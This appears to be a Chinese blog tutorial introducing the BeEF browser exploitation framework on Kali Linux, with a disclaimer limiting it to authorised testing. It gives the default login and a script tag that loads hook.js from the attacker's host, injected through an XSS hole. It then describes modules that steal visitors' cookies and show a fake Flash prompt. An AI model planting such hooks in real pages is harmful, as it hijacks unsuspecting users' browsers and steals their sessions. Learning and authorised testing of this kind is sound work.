zl程序教程

您现在的位置是:首页 >  其它

当前栏目

BEEF的简介与使用

简介 使用
2023-09-14 09:01:44 时间

今天继续给大家介绍渗透测试相关知识,本文主要内容是BEEF的简介与使用。

免责声明:
本文所介绍的内容仅做学习交流使用,严禁利用文中技术进行非法行为,否则造成一切严重后果自负!
再次强调:严禁对未授权设备进行渗透测试!

一、BEEF简介

BEEF,全程为The Browser Exploitation Framework,是一款针对浏览器的渗透测试工具。BEFF集成了很多payload,可以实现很多功能,同时也支持API调用,我们可以自己来编写模块。
在Kali Linux系统上,自动安装了BEFF工具。如下所示:
在这里插入图片描述
我们打开BEEF,可以看到如下登录页面:
在这里插入图片描述
在上述页面中,给我们提供了两条信息,一条是BEEF的XSS引用地址,即本地IP3000端口下的hook.js;另一条是BEEF的管理页面,即本地地址/ui/panel。
我们此时可以看到在当前Kali Linux已经开始监听3000端口,如下所示:
在这里插入图片描述
我们可以访问BEEF的管理页面,如下所示:
在这里插入图片描述
我们输入默认的用户名和密码:beef,即可登录BEEF。

二、BEEF渗透测试实战

接下来,我们使用BEEF进行渗透测试的实战。
BEEF把其攻击脚本全部放在了hook.js的脚本中,因此我们需要在页面中将该文件当作JavaScript脚本代码来执行。一个常见的作法是利用某页面的XSS漏洞,这样我们就可以将下列代码:

<script src="http://192.168.136.66:3000/hook.js"></script>

插入到页面中。其中192.168.136.66为Kali Linux的IP地址。这样,所有访问该页面的用户,都会加载BEEF的攻击脚本,然后就会收到BEEF的攻击了。
我们按照上述思路构造页面,然后让浏览器访问该页面,我们就可以在BEEF的管理页面中看到上线的浏览器信息了,如下所示:
在这里插入图片描述
我们可以进入右侧command页面,就可以发现有如下图所示的攻击载荷。
在这里插入图片描述
在上述攻击载荷中,绿色表示可以使用,并且用户不会察觉,红色表示不可以使用,灰色表示可能能够使用,但是不确定,如果是橙色,则表示可以使用,但是用户会察觉。
我们可以随便选择一个模块,比如或获取目标浏览器的cookie值,那么在执行后结果如下所示:
在这里插入图片描述
此外,我们还可以选择webcam,如下所示:
在这里插入图片描述
这样,则会令用户浏览器显示一个Adobe Flash的提示,如下所示:
在这里插入图片描述
原创不易,转载请说明出处:https://blog.csdn.net/weixin_40228200